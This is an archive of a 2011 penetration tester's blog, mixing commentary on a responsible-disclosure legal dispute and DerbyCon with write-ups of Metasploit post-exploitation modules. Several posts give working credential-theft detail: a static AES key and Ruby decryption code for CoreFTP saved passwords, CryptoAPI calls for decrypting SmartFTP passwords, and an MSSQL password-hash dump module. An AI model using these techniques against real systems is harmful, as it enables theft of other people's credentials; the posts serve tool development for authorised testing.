Monday 17 October 2011

Some facts on the First State Superannuation Issue

Some blogger, has recently written a somewhat uninformed post on the whole Patrick Webster FSS issue. The author seems to be under some misapprehension about how these sorts of things work. Which is cocnerning for someone who claim to be a Web Application Security person, and is taking the pulpit to preach on the issue. Then again, why should we expect anything less from the Internet right?

In his post the author states: " It should go without saying that at this point that he could, just by the actions he had taken up to this point, be in violation of any number of data privacy laws."

Really, goes without saying? Actually it doesn't. Let's take a look. The first statue they claim he is in violation state the following:

308H   Unauthorised access to or modification of restricted data held in computer (summary offence)

(1)  A person:
(a)  who causes any unauthorised access to or modification of restricted data held in a computer, and
(b)  who knows that the access or modification is unauthorised, and
(c)  who intends to cause that access or modification,
      is guilty of an offence.
Maximum penalty: Imprisonment for 2 years.

(2)  An offence against this section is a summary offence.
(3)  In this section:
restricted data means data held in a computer, being data to which access is restricted by an access control system associated with a function of the computer.


Let's look at the other statute that is referenced:

478.1  Unauthorised access to, or modification of, restricted data
             (1)  A person is guilty of an offence if:
                     (a)  the person causes any unauthorised access to, or modification of, restricted data; and
                     (b)  the person intends to cause the access or modification; and
                     (c)  the person knows that the access or modification is unauthorised; and
                     (d)  one or more of the following applies:
                              (i)  the restricted data is held in a Commonwealth computer;
                             (ii)  the restricted data is held on behalf of the Commonwealth;
                            (iii)  the access to, or modification of, the restricted data is caused by means of a carriage service.
Penalty:  2 years imprisonment.
             (2)  Absolute liability applies to paragraph (1)(d).
             (3)  In this section:
restricted data means data:
                     (a)  held in a computer; and
                     (b)  to which access is restricted by an access control system associated with a function of the computer.



Look closely at (3) in both statues. This can only apply if an access control was circumvented. Insecure Direct Object Reference is not bypassing an Access control. It is a complete lack of an Access Control. I may not be a lawyer, but I suspect that this charge would have a VERY hard time standing up in court.

It really is not hard to look up these statues online. I would suggest that people actually read up on the subject matter.  all and all, I would be surprised if this whole matter doesn't blow over. The worst that I suspect will happen is that they make Webster sign that agreement on page 2 of their letter or refuse him any further online access. They could, theoretically, even drop him as a customer I suppose. I doubt any serious legal action will occur, but I could be wrong.

Mr Webster,  I am behind you, and i am sure many others are too. Good luck.

Saturday 15 October 2011

When even Responsible Disclosure Fails

Disclaimer: The opinions expressed in this blog are my own, and do not reflect the views of anyone but myself.

In the latest incident, Patrick Webster of OSI Security, is under threat of legal action. This threat comes after he disclosed a vulnerability to First State Superannuation . The vulnerability was a case of direct Object Reference. By manipulating a GET parameter , Webster was able to access the statements of other customers. The legal threat is based around the idea that Webster violated Australian computer crime laws, and bypassed a security measure. Direct Object reference is not bypassing an access control. It is, by its very nature, the lack of an access control. Webster did not go public with this information, but rather went directly to the company to notify them of the flaw. On one hand, the company thanked him for his help. On the other hand they sicked the police after him and are trying to hold him responsible for the cost of fixing the flaw. Customers of First State Superannuation should be outraged at this. The company, which is responsible for protecting their customers' information has failed to do so. When one of these customers showed this failing, they held him responsible for it. The fact is, FSS has been negligent in providing proper security for their customers. They should be held accountable for this failing. Let's make a hypothetical analogy:

A customer walks into his bank, and asks to access his safety deposit box. They ask him his box number, and he tells them the wrong box number by accident. They bring him another person's box without verifying his identity. When he explains the mistake to them, they call the police and have him arrested.

If you read about this scenario in the newspaper you would be outraged. Why should it be any different in this case?

What is even more deeply disturbing, is the fact that this is far from an isolated incident. In the past year, there have been at least 2 other cases just like this. Earlier this year, a security researched by the handle of Acidgen disclosed a buffer overflow vulnerability to German Software company Magix. Acidgen contacted the company with the information, and had supposedly amiable communication with them. During the course of his conversation, he supplied them with a Proof of Concept that opened up calculator when run. He asked the company to let him know when it would be patched so he could release the details after it had been fixed. This is when Magix began threatening legal action against Acidgen. Among their claims, are the claims that sending the PoC to them constituted distribution of 'hacking tools'. They also claim his intent to release the details after a patch constitutes extortion.

Another example is the PlentyofFish.com dating site hack. Security researchers discovered a vulnerability in the site that allowed access to customers' private data. The researchers claim that they simply informed the operators of the site of the vulnerability. In a bizarre twist, the owner of the site posted a bizarre rambling blog post where he claimed that the researchers attempted to extort him. His story was bizarre in the extreme indicating Russian Mob involvement, extortion, and even originally implicated journalist Brian Krebs in this scheme.

What I see here is a very alarming trend. Companies are trying to redirect all blame for their own failings to the very people who are trying to help make them more secure. If this trend continues, researchers will simply stop practicing responsible disclosure to most of these companies. In some cases the disclosure will go back to Full Disclosure practices. Otherwise, some researchers will just keep silent.

So what would First State Superannuation say if Webster had kept silent. Then a month later someone far less scrupulous exploited this vulnerability to attempt to make a profit. FSS should be thanking Webster for saving them all the embarrassment and possible repercussions of their irresponsible 'security' practices. These companies need to wake up and work with the community to help protect themselves, or things are only going to get worse.

Sunday 9 October 2011

DerbyCon Retrospective

Rel1k recently posted his thoughts on how DerbyCon, and I thought I would share my own. I have not exactly made a secret of how I felt about DerbyCon. The speaker lineup was simply amazing. There were very few spots where I didn't have a talk I wanted to see. I unfortunately had to make some hard decisions between talks that were going at the same time.

When I go to conferences, I often find myself wandering aimlessly for periods. I'm not interested in the talks that are on at that time, and I don't really have anyone to talk to. So I wander about until I find someone I know. Every time I started to wander at Derbycon, I would run into someone who wanted to talk about something. I had no real "down time" the entire conference.

I spent time hanging out with, or at least talking to, people who have been something of heroes to me. I have followed some of these people for years, and getting to talk to them was great. What was even more amazing was that many of them knew who I was! Shaking hands with Chris Gates for the first time was surreal for me. I have followed Chris since I started in security. I tracked dookie2000ca down and finally got him to sign my copy of  Metasploit: A Penetration Tester's Guide.I got to spend time hanging out with jduck, corlanc0der, and sinn3r.  Everywhere I went, I felt not jsut like an equal, but like we were all friends. The most telling thing about the Information Security community is that we call it the Community, not the Industry. DerbyCon embodied this spirit. The entire weekend felt more like a family reunion than a conference, and I was sad to leave.


I was privileged to get to take the CoreLan Exploit Dev bootcamp. This training class was intense. We went from 1600-0200 both days, and didn't make it through everything. Peter Van Eeckhoutte (corelanc0d3r), took a class of 30 people from different backgrounds and walked them through windows exploitation. Some people in the class had absolutely no experience in exploitation. Despite this, Peter kept the entire class moving along, and as far as I could tell, nobody was lost. It was a shame that I had to miss parts of the conference for this training, but I would make the same choice again.

Brandon Perry and I wandered into the CTF room out of curiosity at one point. I had no plans to enter the cTF, so I hadn't really brought any tools with me. We decided to start playing around, not to seriously compete, but to have fun. We shared things we found with each other, and were just having a good time. Before we knew it, we were on top of the leaderboard. The organizers came and asked us to either be scored as a team, or to stop working together. I closed my account out and we kept working together under Brandon's. I was tied up with training for most of the conference, so Brandon spent a lot more time on the CTF than I did. In the end, we ended up in 5th place. I think if we had gone in prepared from the start, and I had the time to focus on it, we could have won. See Brandon's writeup on the CTF efforts here.

A few weeks before Derbycon, I started trying to put together a #metasploit meetup. I wanted to get everyone from the metasploit IRC channel together to hang out for a bit, have some drinks and just have fun. Mubix came up with the idea of throwing a birthday party for ms08-067, so the two ideas merged naturally. Mubix got it all organized and pulled off a great event. There was a big cake  and we all sang happy birthday. Then HD started handing out Redbull and Vodkas to EVERYONE at the party!


So I have ranted for long enough, I guess. The summary is this: Derbycon was probably one of the best experiences I have had. I felt at home the entire time I was there. The entire weekend made me more certain than ever that I am where I belong doing what I am meant to do. I can't possibly thank everybody enough, but thank you conference organizers, Rel1k, HD, Jduck, Corelanc0der, sinn3r, nullthreat, lincoln, bperry, Red, and everyone else I hung out with this weekend.

Saturday 8 October 2011

Update to the Metasploit Exploit Port Wishlist

Here is the latest update to the document I have been creating. This is a list of exploits that are in exploit-db but not in Metasploit. This list is generated by referencing the Knowledge Base in QualysGuard. Its accuracy is not guaranteed, but it should serve as a good starting point for anyone interested in porting exploits to Metasploit.

Saturday 30 July 2011

Metasploit: Dumping Microsoft SQL Server Hashes

New module just committed today: auxiliary/scanner/mssql/mssql_hashdump

This modules takes given credentials and a port and attempts to log into one or more MSSQL Servers. Once it has logged in it will check to make sure it has sysadmin permissions. Assuming it has the needed permissions it will then grab all of the Database Username and Hashes. While it is in there, it will also grab all the Database and Table names. It reports all of this back into the Database for later cracking. Support will be added in the future to the John the Ripper functions to include support for these database hashes. When it does, the database, table names, and instance names will also be sued to seed the JtR wordlists to enhance cracking efforts.



msf  auxiliary(mssql_hashdump) > info

       Name: MSSQL Password Hashdump
     Module: auxiliary/scanner/mssql/mssql_hashdump
    Version: 13435
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  TheLightCosine

Basic options:
  Name                 Current Setting          Required  Description
  ----                 ---------------          --------  -----------
  PASSWORD             reallybadpassword        no        The password for the specified username
  RHOSTS               192.168.1.1,192.168.1.2  yes       The target address range or CIDR identifier
  RPORT                1433                     yes       The target port
  THREADS              1                        yes       The number of concurrent threads
  USERNAME             sa                       no        The username to authenticate as
  USE_WINDOWS_AUTHENT  false                    yes       Use windows authentification

Description:
  This module extracts the usernames and encrypted password hashes
  from a MSSQL server and stores them for later cracking. This module
  also saves information about the server version and table names,
  which can be used to seed the wordlist.

msf  auxiliary(mssql_hashdump) >

Friday 29 July 2011

Metasploit Development Environment In Ubuntu

I have spent some time today getting a new Metasploit Development Environment in place. With a lot of help from DarkOperator and egyp7 I think I have succeeded.

Step 1: Installing some Pre-Reqs

sudo aptitude install build-essential libssl-dev zlib1g zlib1g-dev subversion openssh-server screen bison flex jam exuberant-ctags libreadline-dev libxml2-dev libxslt-dev libpcap-dev libmysqlclient-dev libpq-dev curl git libsqlite3-dev
Step 2 Installing RVM

sudo bash < <(curl -s https://rvm.beginrescueend.com/install/rvm)
Edit your .bashrc file for each user that will be using RVM:
And add the following lines to the end of it:
# Load RVM source if [[ -s "/usr/local/rvm/scripts/rvm" ]] ; then source "/usr/local/rvm/scripts/rvm" ; fi # Enable Tab Completion in RVM [[ -r /usr/local/rvm//scripts/completion ]] && source /usr/local/rvm/scripts/completion

Then from bash run: source /usr/local/rvm/scripts/rvm


Next we install some necessary packages for rvm:

rvm pkg install zlib
rvm pkg install openssl
rvm pkg install readline


Then we install the ruby versions we want


rvm install 1.9.2 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr 



rvm 1.9.2 --default

rvm install 1.9.1 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr

rvm install 1.8.7 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr


Then we install some needed Gems:


rvm gem install --no-rdoc --no-ri wirble pry pg nokogiri mysql sdoc msgpack hpricot sqlite3-ruby

Step 3: Adding DarkOperator's IRB customizations:

Create a file ~/.irbrc

The file should look like this:

puts "Loaded ~/.irbrc"
# Load Lobraries
require 'rubygems'
require 'wirble'
require 'irb/completion' 
# Enable Indentation in irb
IRB.conf[:AUTO_INDENT] = true 
# Enable Syntax Coloring 
Wirble.init
Wirble.colorize 
# get all the methods for an object that aren't basic methods from Object
class Object
def local_methods
(methods - Object.instance_methods).sort
end
end 


This customizes irb to give us syntax highlighting, tab completion, auto-indentation, and simple method enumeration.

Step 4: Installing Metasploit:

Step 5: Running Metasploit:
If you want to run msfconsole with the packaged Ruby, just run 'msfconsole' from bash.
Otherwise select your version like this: rvm 1.8.7
Then call msfconsole with the full path: /opt/metasploit/msf3/msfconsole


That's all there is to it. You are now ready to test your metasploit modules in various different versions of ruby all from the same box.

Once again, thanks to egypt and DarkOperator who provided a lot of this guidance to me.

Tuesday 26 July 2011

Book Review: Metasploit a Penetration Tester's Guide

Earlier this month I picked up Metasploit: A Penetration Tester's Guide. I have, on multiple occasions, had the distinct pleasure to talk with two of the authours, Devon Kearns and Dave Kennedy. These two are shining examples of everything that is right with our industry. They are constantly giving back to the community at large and on an individual basis. They help others and share their knowledge and experience freely without any judgement. This book is just an extension of that behaviour. So enough about them, let's talk about the book.

The book seeks to give a complete overview of the Metasploit framework. This is a herculean task. They no doubt had to make hard decisions about what topics to cover as the most important. All things considered, I think they did an amazing job covering the most important facets. They start off with the basics of the framework: how it's laid out, auxiliary modules, scanners, exploits, getting shell, and what to do once you get a meterpreter session. Then we get to see some of the more advanced aspects, including writing custom fuzzers, developing exploits form scratch, and porting existing exploits into the framework. The book finishes up with a small example penetration test from start to finish. The only topic that they really seemed to skip was the Metasploit WMAP web scanning functionality. Although some Web Application topics were covered through the use of FastTrack.

The way the authours cover the subject matter is excellent. They show you each step, and call your attention to the most improtant parts along the way. It's as close as you can get to demonstration in a book, and it works very well in my opinion. They truly highlight what makes Metasploit great: it's flexibility. they show you how to modify existing modules or write your own. They show how you can use Metasploit in the actual exploit development process as well. Allowing you to birth new exploits completely in the Framework.

I have been using Metasploit since version 2, and I learned new things from this book. Whether it was small things like the SETG command, to some of the more advanced features I have never used before like msfpescan. Whether you are just starting to learn about Penetration Testing or you have been doing it from years, this book is a must read. Unless you are H.D. Moore you will be hard pressed not to get value from this book.

UPDATE: On a note of fairness, Metasploit Unleashed does cover WMAP functionality, even if it did not make it into the book.

Saturday 23 July 2011

Metasploit: Windows User Profile Data

The Metasploit team as added one of my latest submissions. It is a Mixin for Post modules that allows you to enumerate the user profile information on a windows machine. A lot of the psot modules that I and others have written relied on static values for determining paths for things like the AppData folder. While this worked, it was hardcoded for the English language and didn't account for other possible changes to the system.

The new Msf::Post::Windows::UserProfiles mixin seeks to address this issue by using the registry. Two new Registry functions were added into every layer of Meterpreter: RegLoadKey() and RegUnloadKey(). These two functions, incidentally, should also work from a windows shell session.

The first step is to look in the Registry under HKLM/Software/Microsoft/WindowsNT/CurrentVersion/ProfileList
There are a series of subkeys here for the different SIDs that exist on the machine. When we look at each SID's subkey we will see a value called ProfileImagePath which is the user's root profile directory.


The first function in the mixin is read_profile_list(). This parses this key and all of it's subkeys. While it's doing that it reads through HKU to see which of these hives are already loaded and marks them appropriately.


This lets us know what users we should expect to see on the system, and where we can find their NTUSER.DAT file. If we look at the HKU key in our example, we see only the Administrator hive is currently loaded.


So, next the load_missing_hives() function takes all of the hives not currently loaded, and the paths to their registry hives, and loads each one that it can. Below we see the additional Hives loaded into HKU.


We then call parse_profiles(), which takes each hive and calls parse_profile() on it. This pulls the locations of directories like AppData, My Documents, Local Settingsd etc, and assembles it all. We can see the reg key under the user (HKU//Software/Microsoft/WindowsNT/CurrentVersion/Explorer/ShellFolders)



When we are done parsing this data, we may be done with the registry hives themselves, assuming we were only after filesystem data. Since we are done with the hives, we will want to unload them again to minimize our impact on the system. To do that we call unload_our_hives() This function unloads only the hives that we specifically loaded.

All of these functions are exposed in the mixin, meaning that module writers can use as much or as little of it as they want. However, if the module writer just wants to grab the profile directory data, they can just call grab_user_profiles() . This function will walk through the entire process for them, returning an array of hashes containing all of this data. Below we see an example/test module to demonstrate the UserProfile functionality.

-------------------------------------------

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'


class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Windows::UserProfiles

def initialize(info={})
super( update_info( info,
'Name'          => 'Windows Load Reg Hive Test',
'Description'   => %q{ This module exists simply to test
the user profile enuemration mixin},
'License'       => MSF_LICENSE,
'Author'        => [ 'TheLightCosine '],
'Platform'      => [ 'windows' ],
'SessionTypes'  => [ 'meterpreter' ]
))

end

def run

grab_user_profiles().each do |user|
print_status("***Username: #{user['UserName']} SID: #{user['SID']}***")
print_status("Profile dir: #{user['ProfileDir']} LocalSettings dir: #{user['LocalSettings']}")
print_status("AppData: #{user['AppData']} LocalAppData: #{user['LocalAppData']}")
print_status("History: #{user['History']} Cookies: #{user['Cookies']} Favorites:  #{user['Favorites']} ")
print_status("MyDocs: #{user['MyDocs']} Desktop: #{user['Desktop']}")
end


end

end

-------------------------------

Here is what the output of running this test module would look like:

-------------------------------------------------------

meterpreter > run post/windows/gather/hive_test

[*] ***Username: Testuser1 SID: S-1-5-21-1462624396-1657036728-2537704546-1009***
[*] Profile dir: C:\Documents and Settings\Testuser1 LocalSettings dir: C:\Documents and Settings\Testuser1\Local Settings
[*] AppData: C:\Documents and Settings\Testuser1\Application Data LocalAppData: C:\Documents and Settings\Testuser1\Local Settings\Application Data
[*] History: C:\Documents and Settings\Testuser1\Local Settings\History Cookies: C:\Documents and Settings\Testuser1\Cookies Favorites:  C:\Documents and Settings\Testuser1\Favorites
[*] MyDocs: C:\Documents and Settings\Testuser1\My Documents Desktop: C:\Documents and Settings\Testuser1\Desktop
[*] ***Username: Testuser2 SID: S-1-5-21-1462624396-1657036728-2537704546-1010***
[*] Profile dir: C:\Documents and Settings\Testuser2 LocalSettings dir: C:\Documents and Settings\Testuser2\Local Settings
[*] AppData: C:\Documents and Settings\Testuser2\Application Data LocalAppData: C:\Documents and Settings\Testuser2\Local Settings\Application Data
[*] History: C:\Documents and Settings\Testuser2\Local Settings\History Cookies: C:\Documents and Settings\Testuser2\Cookies Favorites:  C:\Documents and Settings\Testuser2\Favorites
[*] MyDocs: C:\Documents and Settings\Testuser2\My Documents Desktop: C:\Documents and Settings\Testuser2\Desktop
[*] ***Username: Administrator SID: S-1-5-21-1462624396-1657036728-2537704546-500***
[*] Profile dir: C:\Documents and Settings\Administrator LocalSettings dir: C:\Documents and Settings\Administrator\Local Settings
[*] AppData: C:\Documents and Settings\Administrator\Application Data LocalAppData: C:\Documents and Settings\Administrator\Local Settings\Application Data
[*] History: C:\Documents and Settings\Administrator\Local Settings\History Cookies: C:\Documents and Settings\Administrator\Cookies Favorites:  C:\Documents and Settings\Administrator\Favorites
[*] MyDocs: C:\Documents and Settings\Administrator\My Documents Desktop: C:\Documents and Settings\Administrator\Desktop
-------------------------------------------------

My latest password extraction module for the SmartFTP client uses this new functionality. I have submitted a patch, that is still pending to implement this functionality across numerous other post modules. Using it to discover profile directories, and in some cases more thoroughly search the registry by loading missing userhives and then unloading them again when done. 

All told this should help make these modules able to function more completely on non-English language pack machines, as well as be more thorough in their searching for critical data in the system.

Tuesday 12 July 2011

Take away the Tools

Indi303 recently had a post on twitter

Dear pentester: Throw away metasploit.... are u still a hacker? If you make excuses about why u are,but need it.. you aren't

It seems like a lot of people did not understand what he was saying, which rather proves the point I think.  He is not saying that Pen Tester should not use Metasploit, or that tools are bad. What he is saying here is that knowing how to use tools does not make you a good pentester. It makes you a script kiddie. We have been interviewing candidates for two new PenTest positions at my work, and I can tell you I feel this keenly.

During our in-person panel interview we ask a long series of questions designed to gauge depth. We ask a number of basic questions. These first sets of questions we are jsut looking for typical responses. These questions can range from simple things like: "how does traceroute actually work" or "What is ring0" to more complex questions like "How do you exploit Blind SQL Injection on Oracle" or "Name two places besides the saved return pointer that you could overwrite to control program execution". The results we have seen on these questions alone are somewhat disappointing and very mixed.

Then we get to where the wheels always seem to come off. This is where we ask the candidates to actually demonstrate the things they have claimed knowledge of. We ask things like "Write out an HTTP GET request on the whiteboard". Some of you are probably saying to yourselves "That is simple". I would agree, and yet no candidate has done it correctly yet. We draw out a URL with GET parameters and ask them "Rewrite this request with a blind SQL injection attack".

The fact is that when asked to demonstrate these skills and knowledge disciplines outside the context of any sort of tool or crutch. One of my colleagues across the wall, in Incident Response land, has suggested that I am being too harsh. That people who can only use tools still have some value. He is right, as far as it goes. what happens though, when you have secured the environment past the point where you can just run metasploit modules and pop boxes. When you need to find design flaws, or 0days to exploit systems. A click-monkey is of no real value there, except maybe fetching coffee.


none of this means you should throw your tools away. Metasploit is a valuable tool and a framework for pentesting.  Those of you who know me, of course know, that when i find something Metasploit doesn't do that I want it to, i try and add it.  So while I can operate without Metasploit, and have to often, i try and continually reduce those occurrence by submitting enhancements to Metasploit. In this way I am also giving back to the community. Something i would encourage EVERY pentester to do: If you see something Metasploit should do, but doesn't, write it and submit it!

Or at least open up a feature request on their Redmine interface.

Thursday 7 July 2011

Information Security: Why we Fail

The very first word seems to be our downfall. Information. If we don't have all of it, we have already failed. So suppose you are in a sizable organisation. Suppose that this organisation has grown inorganically over the years.  You have a problem, and that problem is that there is no single authoritative source of information about your environment.

Now as a Security Engineer or Penetration Test how can you protect that environment from compromise? The answer: you can't.  At least not until you rectify this problem first. The simple fact that is often overlooked is this: it takes only 1 machine being compromised for the situation to spin out of control.  If your knowledge of your environment is incomplete and there are systems your security team is not covering because they don't know it exists, you have failed. It is a matter of when, not if, you suffer a serious breach.  you can secure all of those other hosts on the perimeter, and it will amount to nothing. The host with SQLi in that subnet you never knew about will let the attackers in. Then they are on a trusted machine somewhere in your environment, and their possible avenues of attack are countless.  Hgiher ups within the organisation will demand answers "Why didn't we catch this problem before? Why are we paying you people".

So here's the point of my rant: If you are an org that is attempting a major Information Security initiative, make sure you equip your security people with the Information they need. If it isn't available, then you need to apply some breaks and fix that problem before anything else.


  1.  Identify all of the systems in your environment and where they are. Chances are you're going to find systems that should have been decommed years ago. There is an instant monetary savings for you when you shut them off, as well as a positive step for Security.  
  2. Document all of these systems. What they are, who owns them, etc. Keep this documentation up to date going forward
  3. Identify roles and responsibilities of those systems, and segregate portions of your network appropriately. Implement proper access controls between these segregated environments. If you worry about PCI compliance, this is a MUST.
  4. Now set your Security people to work. Deploy Vulnerability Scanning solutions, arrange Penetration Test Engagements, implement an SDLC, etc.
If you try to skip these first three steps, you will fail. I guarantee it.

Tuesday 21 June 2011

Stealing CoreFTP Passwords with Metasploit

Well folks, I'm at it again. The next client to fall is the CoreFTP client. CoreFTP stores it's saved password in the Windows Registry.

They Can be found under HKEY_USERS\\Software\FTPWare\CoreFTP\Sites, with numbered keys for each saved site. The passwords are stored as ascii representations of their hex values(like most of the others we have seen). The ciphertext is encrypted using AES-128-ECB with a static key of "hdfzpysvpzimorhk".

So once again we rely on our ruby openssl implementations to do our decoding for us. First we pack the text from the registry:
               cipher =[encoded].pack("H*")
Then we set up our AES implementation:

                aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB")
aes.padding = 0
aes.decrypt
aes.key = "hdfzpysvpzimorhk"
password= aes.update(cipher) + aes.final
return password

The  import thing to note here is the aes.padding property. This MUST be set to 0 or you will get bad decrypt errors. It took me quite a while to figure that out. The result, as usual, is an easily decrypted password. This once again highlights that static key encryption in a product like this is next to useless. Products that are going to save sensitive passwords should prompt a user to pick a master password, and sue that as an encryption key. This forever separates the encryption key from the software. It's the only real way to keep that data secure.

I submitted this module today, so it should hopefully get committed sometime in next couple of days. Keep your eyes peeled for post/windows/gather/enum_coreftp_passwords.rb

Sunday 19 June 2011

SmartFTP Password Recovery with Metasploit - The details

So last night I briefly mentioned the new additions I submitted to Metasploit. It looks like they will get merged after the 3.7.2 Release. Metasploit is in a feature freeze at the moment for that release. I wanted to take the opportunity to discuss how the SmartFTP Password recovery module works. It might help other who want to write similar modules in the future.

The Module Can be seen from the Metasploit Website here:



So let's get the simple stuff out of the way first. We pull the OS information and the root System drive information from the Meterpreter stdapi. We then check the OS to see whether we need to be looking for "Documents and Settings" or "Users" off the system root. We then drop into the appropriate users directory and enumerate the individual user Directories. We build the Directory paths based off the combination of all of these factors.

The enum_subdirs function then takes each of these potential SmartFTP data folder paths. If the path does not exist, or we do not have permission to access it, it will throw an exception caught by the rescue statement and will move on to the next path. If it can access the path, then it will enumerate all of the items in that directory.  If the item ends in .xml then it is added to the list of XML files to be parsed. If it is not an XML file, it is assumed to be a directory and is recursively passed back to the enum_subdirs function. In the rare case that this item is not actually a directory, it should throw an exception which will still be caught by the rescue. Once everything has been recursively enumerated, we should have a list of xmlfiles in the session array @xmlfiles.

For each xml file in the array we then run get_xml.  In get_xml we first try to open the file for reading. If for any reason we cannot do that, we catch an exception  let the users know, and move on to the next file. If we can open it, then we read all of the data into memory and send it to the parse_xml function.  parse_xml uses the Metasploit rexml library to parse the XML. We pull the host, port, username, and encrypted password. If no encrypted password is found, we skip this item and move to the next one since there is no password to steal. Once we have the encrypted password we pass it to the real meat and potatoes, our decryption routine.

The first thing we do, is unpack this encoded data as a series of hex bytes. The string is in fact a series of bytes.  So if the encoded string is "9722972FC57CAE5A78DBD64E23968440C794" then it is actually \x97\x22\x97 etc.

So now let's take a moment to look at the new Railgun function definition I have added. These functions come from Advapi32.dll. This DLL is already defined in Railgun so we just have to add the functions to it's definition:


#Functions for Windows CryptoAPI
railgun.add_function('advapi32', 'CryptAcquireContextW', 'BOOL',[
['PDWORD', 'phProv', 'out'],
['PWCHAR', 'pszContainer', 'in'],
['PWCHAR', 'pszProvider', 'in'],
['DWORD', 'dwProvType', 'in'],
['DWORD', 'dwflags', 'in']])

railgun.add_function('advapi32', 'CryptCreateHash', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'Algid', 'in'],
['DWORD', 'hKey', 'in'],
['DWORD', 'dwFlags', 'in'],
['PDWORD', 'phHash', 'out']])

railgun.add_function('advapi32', 'CryptHashData', 'BOOL',[
['LPVOID', 'hHash', 'in'],
['PWCHAR', 'pbData', 'in'],
['DWORD', 'dwDataLen', 'in'],
['DWORD', 'dwFlags', 'in']])

railgun.add_function('advapi32', 'CryptDeriveKey', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'Algid', 'in'],
['LPVOID', 'hBaseData', 'in'],
['DWORD', 'dwFlags', 'in'],
['PDWORD', 'phKey', 'inout']])

railgun.add_function('advapi32', 'CryptDecrypt', 'BOOL',[
['LPVOID', 'hKey', 'in'],
['LPVOID', 'hHash', 'in'],
['BOOL', 'Final', 'in'],
['DWORD', 'dwFlags', 'in'],
['PBLOB', 'pbData', 'inout'],
['PDWORD', 'pdwDataLen', 'inout']])

railgun.add_function('advapi32', 'CryptDestroyHash', 'BOOL',[
['LPVOID', 'hHash', 'in']])

railgun.add_function('advapi32', 'CryptDestroyKey', 'BOOL',[
['LPVOID', 'hKey', 'in']])

railgun.add_function('advapi32', 'CryptReleaseContext', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'dwFlags', 'in']])

There is a lot going on here. So we'll take it a little slow.
For those who don't know, Railgun is a part of Meterpreter that allows a user to hook Windows libraries and access their functions. In this case we are hooking the Advapi32.dll to gain access to the Windows CryptoAPI(CAPI) functions.

CryptAcquireContextW is the Unicode version of the AcquireContext function. This creates the Cryptographic context we will be working in. The first parameter is a pointer to the provider object. the provider object is, in of itself, a pointer to a data structure that will be initialised by this function. So we pass it a pointer to a DWORD for the pointer to be placed in, and set it as an out parameter so the function will return the pointer information to us. We are not using the container object in this case, so we pass it nil. We then tell it what provider to use in this case it is the Microsoft Enhanced Cryptographic Provider. This is passed as a pointer to a string. We then pass it a value to tell it what type of provider to use. WinCrypt.h normally provides Constants for this, but since we don't have access to those constants we pass it the raw numerical value of that constant. In this case we are passing it the value for the RSA_FULL provider. Finally we pass it the appropriate flags. Like the provider type this expects a constant so we need to pass it a numerical value. We pass it CRYPT_VERIFY_CONTEXT(0xF0000000). For more details on the available flags I suggest you look at the MSDN Doc.

CryptCreateHash creates a hash object for us to user in much the same way that AcquireContext created a provider object. We pass it the provider object as the first parameter. Remembering that this object is a pointer to an abstracted in-memory data structure. Then we pass it the algorithm id for what kind of hash algorithm we will be using. Again, this is typically expecting a constant we don't have so we pass it a numerical value. If this hashing algorithm is expecting a key we pass it a key object. Since we are using md5 we pass it a 0 to tell it we are not using a key. We pass it a 0 for the flags. Finally we pass it a pointer to a place in memory for it to store the hash object. Just like the provider object, this is actually a pointer to a memory structure intialised by this function.

CryptHashData is what will actually create the hash for us and put it in the hash object. The first thing we do is pass it our hash object. We then pass it the data to be hashed. In this case we are hashing the string "SmartFTP". We then pass it the data length of 16, and again we pass it no flags with a 0. This is the first step to deriving our Encryption Key.

CryptDeriveKey is going to take our hash and derive an encryption key from it. We pass it our provider object, an integer value for our encryption algorithm(RC4), the Hash object, our flag, and a pointer to a key object. This key object works the same way as the hash and provider objects did before it. The function derives an RC4 key for us and puts it in the memory structure pointed to by our key object.

CryptDecrypt is where the magic finally happens. We pass it our key object as the first parameter. If the data was to be decrypted and hashed at the same time we would pass it a hash object. Since we do not want to hash the results we pass it a 0. The next parameter is whether this is the final section to be decrypted. We pass this a value as true. We pass no flags, and a pointer to the data to be decrypted. Finally  we pass it the length of the data to be decrypted.

The remaining three functions are eseentialy just garbage collection. They close out the memory structures we initalised along the way.

Some of the parameters in these function calls are still not set up in the most ideal fashion. One of the big tricks to remember is that in the end, a pointer is just a number. So even though ruby has no pointer, just treat them as a numbers and pass them back to LPVOIDS.  I will be smoothing out any wrinkles in these function defs soon, and adding the other CAPI functions that I didn't need for this particular module.

Once the decryption is complete. The module displays the results back to the console. It also reports the data back to the backend database. This means the credentials will be stored for the target machines. If you use MetaSploit Pro (which if you are a professional Penetration Tester, I cannot recommend it enough) this will be especially useful. If the remote machines are in your project scope, those credentials will show up in the host information, and can be used for further module usage.

So there you have it. I hope you find this detailed breakdown useful and/or informative. Stay tuned for further updates and developments. I am continuing on my goal of making it into the Metasploit.com Top contributors list, but I suspect I still have a ways to go.

Saturday 18 June 2011

Windows Cryptography with Metasploit and SmartFTP Password Recovery

I have submitted two new additions to Metasploit tonight. The first is a series of function definitions for Railgun. These functions are some of the core Windows CryptoAPI functions. It is not a complete list yet. I only added the ones i needed to complete the other piece I'll tell you about in a minute. I will be working voer the next week to get all of the other CAPI functions defined within Metasploit Railgun. In addition to that, I will try to write a library that will server as an abstraction layer for these function calls. This library will wrap the Windows CAPI Functions as well as serve up alot of the same constants provided by the WinCrypt.h header file. I hope that this will make it easier for other module writers to make use of the windows CryptoAPI whenever they may need it in a Post Module.

The second bit of business is what actually spawned this work. I have submitted a module for Extracting/Recovering saved Passwords from the SmartFTP Client. Like the other modules I have submitted, it finds the passwords saved by users, decrypts them and reports them back to the backend database as well as to the display screen.

I want to take a moment to especially thank jduck and chao-mu who helped me talk through some things while I was working on this. As always the support of the community in the #metasploit IRC channel is amazing.

Thursday 16 June 2011

Metasploit Activities

